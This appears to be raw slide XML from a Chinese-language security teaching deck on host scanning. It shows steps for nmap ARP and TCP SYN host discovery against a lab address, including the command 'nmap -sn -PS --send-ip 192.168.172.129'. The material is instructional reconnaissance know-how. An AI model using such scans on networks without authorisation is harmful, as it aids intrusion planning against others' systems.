                                          <p:spTgt spid="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a:xfrm>
            <a:off x="533756" y="1946091"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行ARP的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="936625" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>步骤一 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="文本框 110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638165" y="1128078"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>7.目标主机对ARP包作出响应，并告诉对方自己的MAC地址，如图2-2-7所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在内网中，ARP扫描比其他的扫描方法都更有效，因为防火墙不会禁止ARP数据包通过。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638165" y="2314258"/>
            <a:ext cx="5276850" cy="3609975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="文本框 111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638165" y="5924233"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-7 目标主机响应ARP包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP SYN协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="文本框 111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702935" y="1152525"/>
            <a:ext cx="5080000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sn -PS --send-ip 192.168.172.129”命令进行TCP SYN主机发现，“-PS”参数表示使用TCP协议中的SYN包进行扫描，“- -send-ip”参数表示不发送ARP数据包，如果本机与目标机在同一个网段，nmap默认会使用ARP协议进行扫描。如图2-2-8所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702935" y="2905760"/>
            <a:ext cx="5276850" cy="1685925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="文本框 112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702935" y="4591685"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
